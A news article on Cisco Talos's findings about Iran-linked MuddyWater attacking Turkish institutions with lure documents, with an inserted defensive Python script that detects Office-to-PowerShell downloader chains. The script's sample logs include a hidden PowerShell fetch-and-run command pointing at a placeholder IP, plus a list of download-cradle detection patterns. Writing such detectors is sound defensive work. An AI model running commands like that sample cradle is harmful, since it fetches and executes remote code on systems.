Iranian Hacker Group Starts Targeting Turkey

Cisco Talos Intelligence Group has shared details of a cyber attack on Turkey by the Iranian state-backed hacker group MuddyWater. In the attacks, whose roots go back to November 2021, fake documents were sent to the targets to install malware on their computers.

As cyber attacks continue to increase significantly around the world, a cyber attack against Turkey was uncovered today. Talos Intelligence Group, part of the network technology company Cisco, revealed the details of a cyber attack against Turkey carried out by an Iranian-backed hacker group.

According to the detailed blog post shared by Cisco Talos, the attack was almost certainly carried out by the advanced persistent threat (APT) group known as MuddyWater, and it targeted private Turkish organizations and state institutions. The attack was carried out with files such as PDFs and Office documents containing malicious code.

These files loaded code onto the computer that would serve as a bridge for future attacks.

According to Talos' statement, the attacks believed to be linked to MuddyWater can be traced back to November 2021. The malicious files used in the attacks, which were reported to target TÜBİTAK, were usually sent via e-mail. When one of these files was downloaded and opened, it presented a download link; that link, hosted on 'snapfile.org', downloaded an Excel file containing malware that gave the hackers access to the computer.


The files used Turkish and official-looking names to appear as legitimate as possible. Some of these filenames suggested the file had been sent by the Ministry of Health or the Ministry of the Interior, while others, such as 'Process_ID' or 'Offer_form_approved', were named to seem important.


The malware, which was installed on the computer via the file downloaded by clicking the link in the PDF, enabled the remote execution of PowerShell code on the machine. The executed code acted as a download manager, fetching additional code to enable further attacks. This gave the hackers the opportunity to attack these computers as they wished.
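The chain described above (an Office document that spawns PowerShell, which then acts as a downloader for further code) is one that defenders can look for in process-creation telemetry. The following is an added example, not code from Talos or from the original article: it runs a simple detection over constructed Sysmon-style process-creation events (the field names follow Sysmon Event ID 1, but every path, command line and IP address below is invented for illustration). It flags an Office application spawning a scripting host, and raises the severity when the command line also carries download or policy-bypass indicators.

```python
"""Detect an Office-document-to-PowerShell downloader chain in process logs.

Added example; not code from Talos or the article. Events are constructed
Sysmon-style Event ID 1 records: the field names ("Image", "ParentImage",
"CommandLine") are Sysmon's, the values are invented for this demo.
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List

# Office applications that a malicious document would be opened in.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
# Script/command hosts that a macro or embedded object typically launches.
SCRIPT_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                   "cscript.exe", "mshta.exe"}

# Command-line fragments typical of a PowerShell stager that fetches more code
# or weakens execution policy. Matched case-insensitively.
DOWNLOAD_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"downloadstring", r"downloadfile", r"invoke-webrequest", r"\biwr\b",
    r"net\.webclient", r"start-bitstransfer", r"-enc(odedcommand)?\s",
    r"frombase64string", r"executionpolicy\s+bypass",
)]


@dataclass
class Finding:
    record_id: int
    severity: str   # "high", "medium" or "low"
    reason: str


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def evaluate(event: Dict[str, object]) -> List[Finding]:
    """Apply the Office -> script host -> downloader logic to one event."""
    rid = int(event.get("RecordId", -1))
    parent = basename(str(event.get("ParentImage", "")))
    child = basename(str(event.get("Image", "")))
    cmdline = str(event.get("CommandLine", ""))

    office_spawn = parent in OFFICE_PARENTS and child in SCRIPT_CHILDREN
    hits = [p.pattern for p in DOWNLOAD_PATTERNS if p.search(cmdline)]

    if office_spawn and hits:
        return [Finding(rid, "high",
                        f"{parent} spawned {child} with downloader/bypass indicators: {hits}")]
    if office_spawn:
        return [Finding(rid, "medium", f"{parent} spawned {child}")]
    if child in {"powershell.exe", "pwsh.exe"} and hits:
        return [Finding(rid, "low", f"{child} with downloader indicators: {hits}")]
    return []


def scan(events: Iterable[Dict[str, object]]) -> List[Finding]:
    """Run evaluate() over a stream of events and collect all findings."""
    return [f for e in events for f in evaluate(e)]


# Constructed sample telemetry: record 1 mimics the article's chain, record 3
# is an Office-spawned shell without download indicators, record 5 is a
# downloader launched from Explorer; records 2 and 4 are benign.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"RecordId": 1,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -ExecutionPolicy Bypass -c "
                    "\"IEX (New-Object Net.WebClient).DownloadString("
                    "'http://198.51.100.7/stage2.ps1')\""},  # 198.51.100.0/24 is a documentation range
    {"RecordId": 2, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-ChildItem C:\\Users"},
    {"RecordId": 3,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c echo hello"},
    {"RecordId": 4, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
    {"RecordId": 5, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": "pwsh.exe -c \"Invoke-WebRequest http://198.51.100.9/a.txt -OutFile a.txt\""},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"[{finding.severity.upper()}] record {finding.record_id}: {finding.reason}")
```

The parent/child pairing is the durable signal here: file names and hosting domains change between campaigns, but a spreadsheet or document has very few legitimate reasons to launch a script host, so that relationship is worth alerting on even before any command-line indicator matches.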


Trakya University and the National Cyber Incident Response Center (USOM) had previously shared a warning about this attack. Trakya University's warning included the e-mail addresses to which the files were sent and the IP addresses believed to be malware command-and-control servers. The addresses in that notice match Talos' research.

Who is the MuddyWater group?


The Iran-based hacker group known as MuddyWater has so far carried out attacks for espionage, intellectual property theft and ransom. The group, which has been active since 2017, has been linked by US Cyber Command to Iran's Ministry of Intelligence and Security.

To learn more technical details about the attack, you can access Talos' blog post by clicking here.
